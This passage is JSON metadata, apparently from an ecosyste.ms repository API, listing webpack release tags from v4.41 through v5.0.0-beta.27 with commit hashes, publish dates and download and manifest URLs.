/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41